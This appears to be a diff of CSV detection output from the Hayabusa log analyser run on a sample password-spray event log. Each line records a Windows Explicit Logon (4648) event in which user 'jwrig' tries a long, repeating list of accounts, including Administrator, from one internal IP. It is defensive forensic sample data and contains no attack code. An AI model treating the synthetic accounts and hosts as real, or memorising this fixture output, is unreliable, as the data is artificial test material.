+2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
